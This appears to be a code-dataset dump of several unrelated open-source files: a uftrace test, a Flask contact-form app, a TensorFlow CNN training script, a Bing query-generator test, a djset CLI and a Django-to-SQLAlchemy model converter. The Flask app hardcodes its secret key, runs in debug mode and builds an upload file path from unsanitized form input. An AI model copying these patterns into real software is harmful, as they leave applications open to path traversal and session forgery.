self.params = {
node.name: node.data
for node in self.graph.nodes if node.data
}
self.params['caffe2fluid_name_trace'] = self.graph.get_name_trace()
return self.params
def transform_source(self):
if self.source is None:
mapper = PaddleMapper(self.graph)
chains = mapper.map()
emitter = PaddleEmitter()
input_nodes = self.graph.get_input_nodes()
self.source = emitter.emit(self.graph.name, chains, input_nodes)
return self.source
| apache-2.0 | -6,877,129,686,947,310,000 | 33.984655 | 97 | 0.570948 | false |
thepaul/uftrace | tests/t222_external_data.py | 1 | 1773 | #!/usr/bin/env python
from runtest import TestBase
import subprocess as sp
TDIR='xxx'
class TestCase(TestBase):
def __init__(self):
TestBase.__init__(self, 'abc', """
# DURATION TID FUNCTION
[28141] | main() {
[28141] | /* external-data: user message */
[28141] | a() {
[28141] | b() {
[28141] | c() {
0.753 us [28141] | getpid();
1.430 us [28141] | } /* c */
1.915 us [28141] | } /* b */
2.405 us [28141] | } /* a */
3.005 us [28141] | } /* main */
""")
def pre(self):
record_cmd = '%s record -d %s %s' % (TestBase.uftrace_cmd, TDIR, 't-abc')
sp.call(record_cmd.split())
replay_cmd = '%s replay -d %s -F main -f time' % (TestBase.uftrace_cmd, TDIR)
p = sp.Popen(replay_cmd.split(), stdout=sp.PIPE)
if p.wait() != 0:
return TestBase.TEST_NONZERO_RETURN
output = p.communicate()[0].decode(errors='ignore')
for l in output.split('\n'):
if l.startswith('#'):
continue;
# parse first line to get the timestamp
t = l.split(' | ')[0].strip()
point = t.find('.')
nsec = int(t[point+1:point+10])
# add the external data right after the first line
msg = '%s.%d %s\n' % (t[:point], nsec + 1, 'user message')
data_file = open(TDIR + '/extern.dat', 'w')
data_file.write(msg)
data_file.close()
break
return TestBase.TEST_SUCCESS
def runcmd(self):
return '%s replay -d %s' % (TestBase.uftrace_cmd.replace(' --no-event',''), TDIR)
def post(self, ret):
sp.call(['rm', '-rf', TDIR])
return ret
| gpl-2.0 | -4,265,747,211,153,739,300 | 30.660714 | 89 | 0.48731 | false |
vwbusguy/beefy-connection | beefyconnection/beefyflask.py | 1 | 2707 | import os,re
from flask import *
from beefy_db import BeefyDatabase
app = Flask(__name__)
def globals():
return { 'title' : 'Beefy Connection!',
'logo' : '/static/images/beefy.png'}
@app.route("/")
def form():
return render_template('mainform.html',**globals())
@app.route("/bc-post",methods=['POST'])
def post():
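    # Read the submitted form fields and store the person in the SQLite database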
session['name'] = request.form.get('first-name') + request.form.get('last-name')
    # TODO: needs server-side validation
databaseConnector = BeefyDatabase("sqlite:///person.db")
first_name_field = "" if (request.form.get("first-name") == None) else request.form.get("first-name")
last_name_field = "" if (request.form.get("last-name") == None) else request.form.get("last-name")
phone_field = "" if (request.form.get("phone") == None) else request.form.get("phone")
city_field = "" if (request.form.get("city") == None) else request.form.get("city")
state_field = "" if (request.form.get("state") == None) else request.form.get("state")
postal_field = "" if (request.form.get("postal") == None) else request.form.get("postal")
irc_field = "" if (request.form.get("irc") == None) else request.form.get("irc")
email_field = "" if (request.form.get("email") == None) else request.form.get("email")
try:
databaseConnector.add_person(first_name=first_name_field,
last_name=last_name_field,
phone=phone_field,
city=city_field,
state=state_field,
postal_code=postal_field,
irc=irc_field,
fb="",
twitter="",
interests="",
email=email_field,
fas="")
return jsonify(status="Success")
except Exception as e:
return jsonify(**{ "status" : "Error",
"message" : str(e)})
@app.route("/bc-upload",methods=['POST'])
def upload():
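    # Strip the data-URI prefix, base64-decode the photo and write it to uploads/<name>.png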
try:
name = session['name']
f = re.sub(r'data.*,','',request.form['photo'] +'==').decode('base64')
fn = open("%s/%s/%s" % (os.path.dirname(os.path.realpath(__file__)),"uploads",name + ".png"),'wb')
fn.write(f)
fn.close()
return jsonify(status="Success")
except Exception as e:
return jsonify(**{ "status" : "Error",
"message" : str(e)})
@app.route("/bc-success")
def success():
return render_template('thanks.html',**globals())
if __name__ == "__main__":
app.secret_key = 'beefy-connect'
app.debug = True
app.run()
| gpl-3.0 | 5,017,488,346,320,035,000 | 41.296875 | 106 | 0.533062 | false |
bgshin/vddc | src/train_single.py | 1 | 5219 | #! /usr/bin/env python
import os
import argparse
import tensorflow as tf
import numpy as np
import datetime
# from utils import cnn_data_helpers
from src.utils.butils import Timer
from sklearn.metrics import precision_score, recall_score, f1_score
# from cnn_models.w2v_cnn import W2V_CNN
from src.models.cnn_model import CNN
from src.utils.cnn_input import DataFeeder
from src.utils.word2vecReader import Word2Vec
import time
import gc
import sys
# Parameters
# ==================================================
# Model Hyperparameters
tf.flags.DEFINE_string("filter_sizes", "2,3,4,5", "Comma-separated filter sizes (default: '3,4,5')")
tf.flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
# Training parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_integer("evaluate_every", 100, "Evaluate model on dev set after this many steps (default: 100)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", True, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
print("")
def load_w2v(w2vdim, simple_run=True, source="twitter"):
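    # Load pre-trained word2vec vectors; with simple_run a single zero-vector stub is returned instead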
if simple_run:
return {'a': np.array([np.float32(0.0)] * w2vdim)}
else:
if source == "twitter":
model_path = '../data/emory_w2v/w2v-%d.bin' % w2vdim
elif source == "amazon":
model_path = '../data/emory_w2v/w2v-%d-%s.bin' % (w2vdim, source)
model = Word2Vec.load_word2vec_format(model_path, binary=True)
print("The vocabulary size is: " + str(len(model.vocab)))
return model
def run_train(w2vsource, w2vdim, w2vnumfilters, randomseed, l2_reg_lambda):
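    # Load embeddings and the yelp data splits, then build the CNN and initialize it with the pre-trained vectors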
with Timer('w2v..'):
w2vmodel, vocab_size = load_w2v(w2vdim=FLAGS.embedding_size)
with Timer('loading trn..'):
yelp_trn = DataFeeder(w2vmodel, 'yelp', 'trn', maxlen=FLAGS.sequence_length, batch_size=FLAGS.n_trn,
shuffle=True)
with Timer('loading dev..'):
batch_size = min(FLAGS.n_dev, FLAGS.max_batch)
yelp_dev = DataFeeder(w2vmodel, 'yelp', 'dev', maxlen=FLAGS.sequence_length, batch_size=batch_size,
shuffle=False)
with Timer('loading tst..'):
batch_size = min(FLAGS.n_tst, FLAGS.max_batch)
yelp_tst = DataFeeder(w2vmodel, 'yelp', 'tst', maxlen=FLAGS.sequence_length, batch_size=batch_size,
shuffle=False)
init = tf.global_variables_initializer()
sess = tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement))
cnn = CNN(vocab_size + 1)
embedding_init = cnn.w2v.assign(cnn.embedding)
sess.run(init)
# embedding init with pre-trained weights
expanded_w2v = np.concatenate((w2vmodel.syn0, np.zeros((1, 100))), axis=0)
sess.run(embedding_init, feed_dict={cnn.embedding: expanded_w2v})
with tf.Graph().as_default():
max_af1_dev = 0
index_at_max_af1_dev = 0
af1_tst_at_max_af1_dev = 0
# Build an initialization operation to run below.
init = tf.global_variables_initializer()
# Start running operations on the Graph. allow_soft_placement must be set to
# True to build towers on GPU, as some of the ops do not have GPU
# implementations.
# gpu_options = tf.GPUOptions(visible_device_list=str('0,1,2,3'), allow_growth=True) # o
gpu_options = tf.GPUOptions(visible_device_list=str('3'), allow_growth=True) # o
sess = tf.Session(config=tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement))
sess.run(init)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--w2vsource', default='twitter', choices=['twitter', 'amazon'], type=str)
parser.add_argument('--w2vdim', default=100, type=int)
parser.add_argument('--w2vnumfilters', default=64, type=int)
parser.add_argument('--randomseed', default=1, type=int)
parser.add_argument('--model', default='w2v', choices=['w2v'],
type=str) # w2v, w2vlex, attention
parser.add_argument('--num_epochs', default=25, type=int)
parser.add_argument('--l2_reg_lambda', default=2.0, type=float)
parser.add_argument('--l1_reg_lambda', default=0.0, type=float)
args = parser.parse_args()
program = os.path.basename(sys.argv[0])
print 'ADDITIONAL PARAMETER\n w2vsource: %s\n w2vdim: %d\n w2vnumfilters: %d\n ' \
'randomseed: %d\n num_epochs: %d\n' \
          'l2_reg_lambda: %f\n l1_reg_lambda: %f\n' \
% (args.w2vsource, args.w2vdim, args.w2vnumfilters, args.randomseed,args.num_epochs,
args.l2_reg_lambda, args.l1_reg_lambda)
with Timer('trn..'):
run_train(args.w2vsource, args.w2vdim, args.w2vnumfilters, args.randomseed,
args.l2_reg_lambda) | apache-2.0 | -6,664,904,199,226,402,000 | 36.285714 | 112 | 0.643801 | false |
jungx098/BingRewards | test/test_gt.py | 2 | 1613 | #!/usr/bin/python2
import os
import sys
import random
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "pkg/queryGenerators"))
from googleTrends import queryGenerator
if __name__ == '__main__':
G = queryGenerator("nothing")
T = queryGenerator("nothing2")
history = set("nothing")
#print "all queries len:", len(G.allQueries)
#print "unused queries len:", len(G.unusedQueries)
#print "--Running 1st query"
set1 = T.generateQueries(100,history)
print "set size", len(set1)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
size = len(set1)
set1 = set(random.sample(set1, len(set1)-5))
print "after random set1 size:", len(set1)
print "using set1 as a history for another search"
print "--Running 2nd query"
queries = G.generateQueries(100,set1)
print "set size", len(queries)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
if set1.isdisjoint(queries):
print "No history results are in the final set"
print "--Running 3nd query"
queries2 = G.generateQueries(100,history)
print "set size", len(queries2)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
print "Shared entries between query2 and 3:", len(queries.intersection(queries2))
print "--Running 4th query"
queries3 = G.generateQueries(125,history)
print "set size", len(queries3)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
| lgpl-3.0 | 3,604,711,186,154,659,300 | 35.659091 | 85 | 0.676379 | false |
bretth/djset | djset/commands.py | 1 | 1634 |
from docopt import docopt
import os
import sys
from .djset import DjSecret, DjConfig
from .utils import _locate_settings
COMMAND = """
Usage: dj%(cmd)s add <key>=<value> [--global] [--name=<name> | --settings=<settings>]
dj%(cmd)s remove <key> [--global] [--name=<name> | --settings=<settings>]
"""
def _create_djset(args, cls):
""" Return a DjSecret object """
name = args.get('--name')
settings = args.get('--settings')
if name:
return cls(name=name)
elif settings:
return cls(name=settings)
else:
return cls()
def _parse_args(args, cls):
""" Parse a docopt dictionary of arguments """
d = _create_djset(args, cls)
key_value_pair = args.get('<key>=<value>')
key = args.get('<key>')
func = None
if args.get('add') and key_value_pair:
fargs = tuple(args.get('<key>=<value>').split('='))
if fargs[1]:
func = d.set
elif args.get('remove') and key:
func = d.remove
fargs = (args.get('<key>'),)
kwargs = {'glob': args.get('--global')}
if func:
return func, fargs, kwargs
else:
return None, None, None
def main(command, cls):
sys.path.append(os.getcwd())
args = docopt(command)
func, fargs, kwargs = _parse_args(args, cls)
if func:
func(*fargs, **kwargs)
s = _locate_settings(args.get('--settings'))
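    # Touch the settings module so its modification time is updated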
os.utime(s, None)
def djsecret():
command = COMMAND % {'cmd': 'secret'}
main(command, DjSecret)
def djconfig():
command = COMMAND % {'cmd': 'config'}
main(command, DjConfig)
| mit | -980,778,445,093,819,100 | 22.681159 | 86 | 0.563035 | false |
dvhbru/dvhb-hybrid | dvhb_hybrid/amodels/convert.py | 1 | 6278 | import logging
import sqlalchemy as sa
import sqlalchemy.types as sa_types
from django.db.models import ForeignKey, ManyToManyField, ManyToManyRel, OneToOneField
from sqlalchemy.dialects.postgresql import ARRAY as SA_ARRAY, JSONB as SA_JSONB, UUID as SA_UUID
from .model import Model
from .relations import ManyToManyRelationship
from ..utils import convert_class_name
logger = logging.getLogger(__name__)
def Geometry(*args, **kwargs):
return sa_types.NullType()
class FieldConverter:
"""
Converts Django field to SQLAlchemy column clause
.. code-block::python
converter = FieldConverter()
sa_column = converter.convert(field)
"""
def __init__(self):
self._types = {
# Django internal type => SQLAlchemy type
'ArrayField': SA_ARRAY,
'AutoField': sa_types.Integer,
'BigAutoField': sa_types.BigInteger,
'BigIntegerField': sa_types.BigInteger,
'BooleanField': sa_types.Boolean,
'CharField': sa_types.String,
'DateField': sa_types.Date,
'DateTimeField': sa_types.DateTime,
'DecimalField': sa_types.Numeric,
'DurationField': sa_types.Interval,
'FileField': sa_types.String,
'FilePathField': sa_types.String,
'FloatField': sa_types.Float,
'GenericIPAddressField': sa_types.String,
'IntegerField': sa_types.Integer,
'JSONField': SA_JSONB,
'NullBooleanField': sa_types.Boolean,
'PointField': Geometry,
'PositiveIntegerField': sa_types.Integer,
'PositiveSmallIntegerField': sa_types.SmallInteger,
'SlugField': sa_types.String,
'SmallIntegerField': sa_types.SmallInteger,
'TextField': sa_types.Text,
'TimeField': sa_types.Time,
'UUIDField': SA_UUID,
# TODO: Add missing GIS fields
}
def _convert_type(self, dj_field, sa_type):
kwargs = {}
if sa_type is SA_ARRAY:
internal_type = dj_field.base_field.get_internal_type()
kwargs['item_type'] = self._types.get(internal_type)
if kwargs['item_type'] is None:
raise ConversionError(
'Unable convert array: '
'item type "%s" not found' % internal_type
)
elif sa_type is Geometry:
kwargs['geometry_type'] = 'POINT'
kwargs['srid'] = dj_field.srid
elif sa_type is sa_types.Numeric:
            kwargs['scale'] = dj_field.decimal_places
kwargs['precision'] = dj_field.max_digits
elif sa_type in (sa_types.String, sa_types.Text):
kwargs['length'] = dj_field.max_length
elif sa_type is SA_UUID:
kwargs['as_uuid'] = True
return sa_type(**kwargs)
def convert(self, dj_field):
result = []
if isinstance(dj_field, (ForeignKey, OneToOneField)):
result.append(dj_field.column)
convert_from = dj_field.target_field
else:
result.append(dj_field.name)
convert_from = dj_field
internal_type = convert_from.get_internal_type()
convert_to = self._types.get(internal_type)
if convert_to is not None:
result.append(self._convert_type(convert_from, convert_to))
else:
logger.info(
'Not found corresponding '
'SQLAlchemy type for "%s"(%r)',
internal_type,
dj_field
)
return sa.column(*result)
FIELD_CONVERTER = FieldConverter()
def convert_m2m(field):
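    # Work out the through model and the source/target column names for the m2m relation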
if isinstance(field, ManyToManyField):
dj_model = field.remote_field.through
source_field = field.m2m_column_name()
target_field = field.m2m_reverse_name()
elif isinstance(field, ManyToManyRel):
dj_model = field.through
source_field = field.remote_field.m2m_reverse_name()
target_field = field.remote_field.m2m_column_name()
else:
raise ConversionError('Unknown many to many field: %r' % field)
def m2m_factory(app):
model_name = convert_class_name(dj_model.__name__)
if hasattr(app.m, model_name):
# Get existing relationship model
model = getattr(app.m, model_name)
else:
# Create new relationship model
model = type(dj_model.__name__, (Model,), {})
model.table = model.get_table_from_django(dj_model)
model = model.factory(app)
        # Note that the async model's name should equal the corresponding Django model's name
target_model_name = convert_class_name(field.related_model.__name__)
target_model = getattr(app.m, target_model_name)
return ManyToManyRelationship(app, model, target_model, source_field, target_field)
return m2m_factory
def convert_model(model, **field_types):
"""
Converts Django model to SQLAlchemy table
"""
options = model._meta
fields = []
rels = {}
for f in options.get_fields():
i = f.name
if i in field_types:
fields.append(sa.column(i, field_types[i]))
elif f.is_relation:
if f.many_to_many:
rels[i] = convert_m2m(f)
elif f.many_to_one:
# TODO: Add ManyToOneRelationship to rels
fields.append(FIELD_CONVERTER.convert(f))
elif f.one_to_many:
pass # TODO: Add OneToManyRelationship to rels
elif f.one_to_one:
# TODO: Add OneToOneRelationship to rels
if not f.auto_created:
fields.append(FIELD_CONVERTER.convert(f))
else:
raise ConversionError('Unknown relation: {}'.format(i))
else:
fields.append(FIELD_CONVERTER.convert(f))
return sa.table(options.db_table, *fields), rels
def derive_from_django(dj_model, **field_types):
def wrapper(amodel):
table, rels = convert_model(dj_model, **field_types)
amodel.table = table
amodel.relationships = rels
return amodel
return wrapper
class ConversionError(Exception):
pass
| mit | 5,080,585,300,669,108,000 | 34.072626 | 96 | 0.587608 | false |